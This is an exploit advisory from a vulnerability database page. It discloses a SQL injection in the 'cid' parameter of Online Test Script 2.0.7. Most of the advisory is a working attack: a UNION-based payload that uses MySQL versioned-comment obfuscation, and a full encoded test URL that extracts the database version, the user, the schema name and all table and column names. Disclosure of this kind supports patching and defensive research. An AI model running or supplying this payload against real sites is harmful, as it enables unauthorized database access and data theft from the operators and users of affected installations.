Online Test Script 2.0.7 SQL Injection

2018.02.08
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: Online Test Script 2.0.7 - 'cid' SQL Injection # Dork: N/A # Date: 2018-02-07 # Exploit Author: Borna nematzadeh (L0RD) or borna.nematzadeh123@gmail.com # Vendor Homepage: https://www.phpscriptsmall.com/product/online-test-script/ # Version: 2.0.7 # Category: Webapps # CVE: N/A # # # # # # Description: # The vulnerability allows an attacker to inject sql commands. # # # # # # Proof of Concept : SQLi: # server/login.php?normal&cid=[SQL] # Parameter : cid (GET) # Type: UNION QUERY # Title: Generic UNION query (NULL) - 5 columns # payload : /*!00000UNION*/ ALL SELECT NULL,/*!00000Concat('L0RD',0x3C62723E,version(),0x3C62723E,user(),0x3C62723E,database())*/,/*!00000group_coNcat(0x3C62723E,table_name,0x3a,column_name)*/,NULL,NULL /*!00000from*/ information_schema.columns where table_schema=schema()%23 Test : http://server/login.php?normal&cid=-2%20/*!00000UNION*/%20ALL%20SELECT%20NULL,/*!00000Concat(%27L0RD%27,0x3C62723E,version(),0x3C62723E,user(),0x3C62723E,database())*/,/*!00000group_coNcat(0x3C62723E,table_name,0x3a,column_name)*/,NULL,NULL%20/*!00000from*/%20information_schema.columns%20where%20table_schema=schema()%23


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top